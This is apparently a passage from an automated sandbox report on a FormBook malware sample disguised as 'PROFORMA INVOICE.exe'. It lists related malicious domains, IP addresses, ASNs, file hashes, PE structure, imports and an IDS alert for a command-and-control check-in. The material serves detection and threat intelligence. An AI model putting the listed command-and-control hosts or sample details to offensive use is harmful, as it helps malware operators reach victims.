	hH4dbIGfGT.exe	Get hash	malicious	FormBook	Browse	www.dverkom.store/zwd9/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.servannto.site	Shipping documents..exe	Get hash	malicious	FormBook	Browse	31.31.196.17
www.servannto.site	SALARY OF OCT 2024.exe	Get hash	malicious	FormBook	Browse	31.31.196.17
www.huiguang.xyz	rGO880-PDF.exe	Get hash	malicious	FormBook	Browse	154.92.61.37
	Shipping documents..exe	Get hash	malicious	FormBook	Browse	154.92.61.37
	SALARY OF OCT 2024.exe	Get hash	malicious	FormBook	Browse	154.92.61.37
www.klohk.tech	Shipping documents..exe	Get hash	malicious	FormBook	Browse	103.224.182.242
www.klohk.tech	SALARY OF OCT 2024.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
www.telforce.one	Shipping documents..exe	Get hash	malicious	FormBook	Browse	13.248.169.48
www.telforce.one	SALARY OF OCT 2024.exe	Get hash	malicious	FormBook	Browse	13.248.169.48

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
POWERLINE-AS-APPOWERLINEDATACENTERHK	xd.spc.elf	Get hash	malicious	Mirai	Browse	45.202.220.136
	rDocument11-142024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	rGO880-PDF.exe	Get hash	malicious	FormBook	Browse	154.92.61.37
	meerkat.arm.elf	Get hash	malicious	Mirai	Browse	160.124.107.230
	botnet.spc.elf	Get hash	malicious	Mirai, Moobot	Browse	107.151.95.239
	glued.hta	Get hash	malicious	FormBook	Browse	154.215.72.110
	xBzBOQwywT.exe	Get hash	malicious	FormBook	Browse	156.242.132.82
	h0r0zx00x.x86.elf	Get hash	malicious	Mirai	Browse	156.251.7.171
	Shipping documents..exe	Get hash	malicious	FormBook	Browse	154.92.61.37
	sora.sh4.elf	Get hash	malicious	Mirai	Browse	154.216.83.133
TRELLIAN-AS-APTrellianPtyLimitedAU	Item-RQF-9456786.exe	Get hash	malicious	Unknown	Browse	103.224.182.242
	8dPlV2lT8o.exe	Get hash	malicious	Simda Stealer	Browse	103.224.182.252
	7ObLFE2iMK.exe	Get hash	malicious	Simda Stealer	Browse	103.224.182.252
	UMwpXhA46R.exe	Get hash	malicious	Simda Stealer	Browse	103.224.182.252
	1fWgBXPgiT.exe	Get hash	malicious	Simda Stealer	Browse	103.224.182.252
	arxtPs1STE.exe	Get hash	malicious	Simda Stealer	Browse	103.224.182.252
	Z8eHwAvqAh.exe	Get hash	malicious	Simda Stealer	Browse	103.224.182.252
	WlCVLbzNph.exe	Get hash	malicious	Simda Stealer	Browse	103.224.182.252
	Bpfz752pYZ.exe	Get hash	malicious	Simda Stealer	Browse	103.224.182.252
	uavINoSIQh.exe	Get hash	malicious	Simda Stealer	Browse	103.224.182.252
AS-REGRU	Item-RQF-9456786.exe	Get hash	malicious	Unknown	Browse	194.58.112.174
	PO AT-5228.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	shipping doc_20241111.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	file_1443.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	194.58.42.154
	lsass.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	194.58.42.154
	yakuza.i686.elf	Get hash	malicious	Unknown	Browse	212.24.36.97
	ppc.elf	Get hash	malicious	Unknown	Browse	193.124.205.75
	arm5.elf	Get hash	malicious	Unknown	Browse	193.124.205.75
	mpsl.elf	Get hash	malicious	Unknown	Browse	193.124.205.75
	arm7.elf	Get hash	malicious	Mirai	Browse	193.124.205.75
VNPT-AS-VNVNPTCorpVN	yakuza.arm4.elf	Get hash	malicious	Mirai	Browse	14.186.221.243
	yakuza.ppc.elf	Get hash	malicious	Mirai	Browse	14.248.237.190
	http://weststoneltd.technolutionszzzz.net	Get hash	malicious	EvilProxy, HTMLPhisher	Browse	203.161.41.21
	x86.elf	Get hash	malicious	Unknown	Browse	113.189.0.97
	ppc.elf	Get hash	malicious	Mirai	Browse	14.248.199.46
	PO-DC13112024_pdf.vbs	Get hash	malicious	Unknown	Browse	203.161.46.205
	qkbfi86.elf	Get hash	malicious	Mirai	Browse	14.238.234.234
	botnet.sh4.elf	Get hash	malicious	Mirai, Moobot	Browse	14.244.97.178
	Item-RQF-9456786.exe	Get hash	malicious	Unknown	Browse	203.161.46.205
	meerkat.mips.elf	Get hash	malicious	Mirai	Browse	14.227.1.142

Process:	C:\Windows\SysWOW64\ktmutil.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Bactris

Download File

Process:	C:\Users\user\Desktop\PROFORMA INVOICE.exe
File Type:	data
Category:	dropped
Size (bytes):	288256
Entropy (8bit):	7.992955982747393
Encrypted:	true
SSDEEP:	6144:nZ9Ed+zkvC1BGtCHsYJBBVObAAUNIjMRVkTdyv/h5F:nbQ+z+DQ/VcMFIjM7wA/hj
MD5:	86CA983B29F9C595161EA590F941ABE7
SHA1:	B066ECF3670741732FFA21F4D69E1C89753975E1
SHA-256:	AEE0CCBC0C998ABE5062681FA1A19D2559BC335A43738999498C10B34BE3D647
SHA-512:	0771EA768072DAF74ADD5CEDE8F69F3E858096A27A445C8158478C45B68A6DE12C98FAA7B27AFDB336528753BDC1188D40A9264E913097E29150F535E3D92C19
Malicious:	false
Reputation:	low
Preview:	..sg.HRS0..[...n.0N...6G...0MPAR65OHRS0MPAR65OHRS0MPAR65O.RS0CO.\6.F.s.1..`.^\<h"!_" ?.V.&<<Dm2$rD@!h;=....r[Z+-\|^=GtAR65OHR1D.\|2Q.r(5..-7.H...r24.W...U(.H...l!5.g&+:nP.AR65OHRS`.PA.74Oq..QMPAR65OH.S2L[@Y65.LRS0MPAR65.\RS0]PARF1OHR.0M@AR67OHTS0MPAR63OHRS0MPA"25OJRS0MPAP6u.HRC0M@AR65_HRC0MPAR6%OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR6.;-'0MP..25OXRS0.TAR&5OHRS0MPAR65OHrS0-PAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0M

C:\Users\user\AppData\Local\Temp\autBAAF.tmp

Download File

Process:	C:\Users\user\Desktop\PROFORMA INVOICE.exe
File Type:	data
Category:	dropped
Size (bytes):	288256
Entropy (8bit):	7.992955982747393
Encrypted:	true
SSDEEP:	6144:nZ9Ed+zkvC1BGtCHsYJBBVObAAUNIjMRVkTdyv/h5F:nbQ+z+DQ/VcMFIjM7wA/hj
MD5:	86CA983B29F9C595161EA590F941ABE7
SHA1:	B066ECF3670741732FFA21F4D69E1C89753975E1
SHA-256:	AEE0CCBC0C998ABE5062681FA1A19D2559BC335A43738999498C10B34BE3D647
SHA-512:	0771EA768072DAF74ADD5CEDE8F69F3E858096A27A445C8158478C45B68A6DE12C98FAA7B27AFDB336528753BDC1188D40A9264E913097E29150F535E3D92C19
Malicious:	false
Preview:	..sg.HRS0..[...n.0N...6G...0MPAR65OHRS0MPAR65OHRS0MPAR65O.RS0CO.\6.F.s.1..`.^\<h"!_" ?.V.&<<Dm2$rD@!h;=....r[Z+-\|^=GtAR65OHR1D.\|2Q.r(5..-7.H...r24.W...U(.H...l!5.g&+:nP.AR65OHRS`.PA.74Oq..QMPAR65OH.S2L[@Y65.LRS0MPAR65.\RS0]PARF1OHR.0M@AR67OHTS0MPAR63OHRS0MPA"25OJRS0MPAP6u.HRC0M@AR65_HRC0MPAR6%OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR6.;-'0MP..25OXRS0.TAR&5OHRS0MPAR65OHrS0-PAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0MPAR65OHRS0M

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.148830174827262
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PROFORMA INVOICE.exe
File size:	1'216'000 bytes
MD5:	f8e4e80faa805326b35ddc61ae9780f9
SHA1:	6f6a6da9230b47109cc5f4ca4fe69f3a9b063840
SHA256:	315cce3d409b020ca20c727e368fb9e5a7b99f390b0329e6657b64a1383d9c1b
SHA512:	ef53432ab3fab53ca8f95c3f9f79883346112d6fc1b1f89b318f873706baf5ca2b1b52d1a32d283aadf0352bdc3682acd0337d40a74478cc46c2cce7c56ff112
SSDEEP:	24576:5tb20pkaCqT5TBWgNQ7aaNNHPGsMOwr9wsIss3q/x6/cm6A:KVg5tQ7aaN5lwr9wHD3MY5
TLSH:	6745D02273DE8361C3B25273BA657701AEBF782506B1F96B2FD4093DE920162521E773
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x425f74
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67368B9D [Thu Nov 14 23:45:33 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3d95adbf13bbe79dc24dccb401c12091

Entrypoint Preview

Instruction
call 00007F208D287D7Fh
jmp 00007F208D27AD94h
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F208D27AF1Ah
cmp edi, eax
jc 00007F208D27B27Eh
bt dword ptr [004C0158h], 01h
jnc 00007F208D27AF19h
rep movsb
jmp 00007F208D27B22Ch
cmp ecx, 00000080h
jc 00007F208D27B0E4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F208D27AF20h
bt dword ptr [004BA370h], 01h
jc 00007F208D27B3F0h
bt dword ptr [004C0158h], 00000000h
jnc 00007F208D27B0BDh
test edi, 00000003h
jne 00007F208D27B0CEh
test esi, 00000003h
jne 00007F208D27B0ADh
bt edi, 02h
jnc 00007F208D27AF1Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F208D27AF23h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F208D27AF75h
bt esi, 03h
jnc 00007F208D27AFC8h
movdqa xmm1, dqword ptr [esi+00h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2012 UPD4 build 61030
[RES] VS2012 UPD4 build 61030
[LNK] VS2012 UPD4 build 61030

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb7004	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc4000	0x5fd9c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x124000	0x6c4c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8d8d0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb2730	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8d000	0x860	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8b54f	0x8b600	f437a6545e938612764dbb0a314376fc	False	0.5699499019058296	data	6.680413749210956	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8d000	0x2cc42	0x2ce00	827ffd24759e8e420890ecf164be989e	False	0.330464397632312	data	5.770192333189168	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xba000	0x9d54	0x6200	e0a519f8e3a35fae0d9c2cfd5a4bacfc	False	0.16402264030612246	data	2.002691099965349	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc4000	0x5fd9c	0x5fe00	deba2aa1fd79f9d2bd547e418930228f	False	0.9317373899934811	data	7.90221273709714	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x124000	0xa474	0xa600	0bc98f8631ef0bde830a7f83bb06ff08	False	0.5017884036144579	data	5.245426654116355	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xc8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xca038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xca4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xca4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcaa84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcc7b8	0x570a1	data			1.0003253738292854
RT_GROUP_ICON	0x12385c	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x1238d4	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x1238e8	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x1238fc	0x14	data	English	Great Britain	1.25
RT_VERSION	0x123910	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x1239ec	0x3b0	ASCII text, with CRLF line terminators	English	Great Britain	0.5116525423728814

Imports

DLL	Import
WSOCK32.dll	__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll	SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll	SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-15T04:21:34.416407+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49737	154.92.61.37	80	TCP
